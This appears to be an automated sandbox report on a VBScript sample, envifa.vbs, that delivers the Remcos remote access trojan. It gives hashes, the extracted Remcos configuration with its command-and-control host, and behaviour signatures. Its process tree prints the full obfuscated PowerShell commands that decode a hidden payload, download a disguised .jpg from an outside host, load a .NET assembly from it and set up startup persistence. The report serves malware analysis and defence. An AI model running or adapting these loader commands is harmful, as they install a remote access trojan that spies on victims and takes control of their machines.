Analysis
- max time kernel: 149s
- max time network: 155s
- platform: windows10-2004_x64
- resource: win10v2004-20231127-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20231127-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 07/12/2023, 12:45
Tasks
- Static task: static1
- Behavioral task: behavioral1 (Sample: envifa.vbs, Resource: win7-20231023-en)
- Behavioral task: behavioral2 (Sample: envifa.vbs, Resource: win10v2004-20231127-en)
General
- Target: envifa.vbs
- Size: 154KB
- MD5: 18bb62e29138d9c8dd098e5be9a4c13c
- SHA1: 5362535f49fee8fd7333be8fc6ea249deffa2eb9
- SHA256: e0ad36136960203db1aea53780b49ef2c819ad31d68980822c4dff0d8dab1a14
- SHA512: 0a0e37dab52b3892a9148e40f12408256c8d8eb6dede9217bb47cda010ae672775bd88535b0ab94c6800b3e22ab7c53ae6e9fe8dcd790e9849cfb749fa5b77b8
- SSDEEP: 384:5UDkE9rQyhN65y//88tyLYtymNDycT+zjgyX4uynPivlytR/dJPfyFfhywzqggCq:j2Nek58Rc
Malware Config
Extracted: remcos
- RemoteHost: remccoss2023.duckdns.org:4576
- audio_folder: MicRecords
- audio_record_time: 5
- connect_delay: 0
- connect_interval: 1
- copy_file: remcos.exe
- copy_folder: Remcos
- delete_file: false
- hide_file: false
- hide_keylog_file: false
- install_flag: false
- keylog_crypt: false
- keylog_file: registros.dat
- keylog_flag: false
- keylog_folder: remcos
- mouse_option: false
- mutex: Rmc-E5ZBB0
- screenshot_crypt: false
- screenshot_flag: false
- screenshot_folder: Capturas de pantalla
- screenshot_path: %AppData%
- screenshot_time: 10
- take_screenshot_option: false
- take_screenshot_time: 5
Signatures
- Blocklisted process makes network request (2 IoCs)
  flow 20, pid 3076, process powershell.exe
  flow 31, pid 3076, process powershell.exe
- Checks computer location settings (2 TTPs, 1 IoC)
  Looks up country code configured in the registry, likely geofence.
  Key value queried: \REGISTRY\USER\S-1-5-21-3028534956-1709433221-1313273668-1000\Control Panel\International\Geo\Nation (process WScript.exe)
- Drops startup file (1 IoC)
  File created: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\google.lnk (process powershell.exe)
- Suspicious use of SetThreadContext (1 IoC)
  PID 3076 set thread context of 5080 (pid 3076, process powershell.exe, procid_target 98)
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
- Suspicious behavior: EnumeratesProcesses (6 IoCs)
  pid 2316, process powershell.exe (2 events)
  pid 3076, process powershell.exe (2 events)
  pid 1216, process powershell.exe (2 events)
- Suspicious use of AdjustPrivilegeToken (3 IoCs)
  Token: SeDebugPrivilege, pid 2316, process powershell.exe
  Token: SeDebugPrivilege, pid 3076, process powershell.exe
  Token: SeDebugPrivilege, pid 1216, process powershell.exe
- Suspicious use of SetWindowsHookEx (1 IoC)
  pid 5080, process RegAsm.exe
- Suspicious use of WriteProcessMemory (18 IoCs)
  PID 1380 wrote to memory of 2316 (pid 1380, process WScript.exe, procid_target 86) (2 events)
  PID 2316 wrote to memory of 3076 (pid 2316, process powershell.exe, procid_target 88) (2 events)
  PID 3076 wrote to memory of 1216 (pid 3076, process powershell.exe, procid_target 92) (2 events)
  PID 3076 wrote to memory of 5080 (pid 3076, process powershell.exe, procid_target 98) (12 events)
Processes
C:\Windows\System32\WScript.exe (PID 1380)
  Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\envifa.vbs"
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2316)
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = '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';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('WOQNgdNPWgDJDs','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 3076)
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".((VArIablE '*mdR*').NAmE[3,11,2]-JOin'')(('Z1qima'+'geUrl = 9glhttps://uploaddeimagens.'+'c'+'om.br/images/004/682/796/original/dll.jpg?17017939659gl;Z1qwebClient = New-Objec'+'t System.N'+'et.WebC'+'lient;Z1qimageBytes = Z'+'1qwebClient.DownloadData(Z1qimageUrl);Z1qimageText = [System.Text.Encoding]::UTF8.G'+'etString(Z1qimageBytes);Z1qstartFlag = 9gl<<BASE64_START>>9gl;Z1qendFlag = 9g'+'l<<BASE64_END>>9gl;Z1qstar'+'tIndex = Z1q'+'imageText.IndexOf(Z1qstartFlag);Z1qendIndex = Z1qimageTex'+'t.IndexOf(Z1qendFlag);Z1qstartIndex -ge 0 -and Z1qendIndex -gt Z'+'1'+'qstartIndex;Z1qstartIndex += Z1qstartFlag.Length;Z1q'+'base64Length = Z1qendIndex '+'- Z1qstartInde'+'x;Z1qbase64Command = Z1qimageText.Substr'+'ing(Z1qstartIndex, Z1qbase6'+'4Length);Z'+'1qcommandB'+'ytes = [System.Convert]'+'::'+'F'+'romBase64String(Z1qbase64Command);Z1qloadedAssembly'+' = [System.R'+'eflection.Assembly]::Load(Z1qcommandBytes);Z1qtype = Z1qloadedAssem'+'bly.GetType(9glClassLibrary3.Class19gl);Z'+'1qm'+'ethod = Z1qtype.GetMethod(9glRun9gl).Inv'+'oke('+'Z1qnull,'+' [object[]] (9glJjBhYmMzYjcwMjM1NjQxM2JlNzAyYTg5NjA0ZWVkMjk3YjdjZjI4Yzg0MGI1NjY2NDk1YjMxMGYxMD'+'E3N2UwZWE9bWgmNjc1O'+'DA3NTY9'+'c2kmNjdhZjI4NT'+'Y9e'+'GU/dHh0LmlpaWlzc29jbWVyLzM2MjM5MTA5MzIzODU2OTE4MTEvMDUxODYxMTI0MjQ1NTY5MTgxMS9zdG5lbWhjYXR0YS9tb2MucHBhZHJvY3NpZC5uZGMvLzpzc'+'HR0aA==9gl , 9gl9gl , 9gl29gl , 9glgoogle9gl , 9gl39gl , 9glC:rBAProgramDatarBA9gl, 9glgoogle9gl))').RepLAcE('9gl',[sTriNG][CHAr]39).RepLAcE('Z1q',[sTriNG][CHAr]36).RepLAcE(([CHAr]114+[CHAr]66+[CHAr]65),'\') )"
      - Blocklisted process makes network request
      - Drops startup file
      - Suspicious use of SetThreadContext
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe (PID 1216)
        Command line: "C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\google.vbs
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe (PID 5080)
        Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        - Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Enterprise v15
Downloads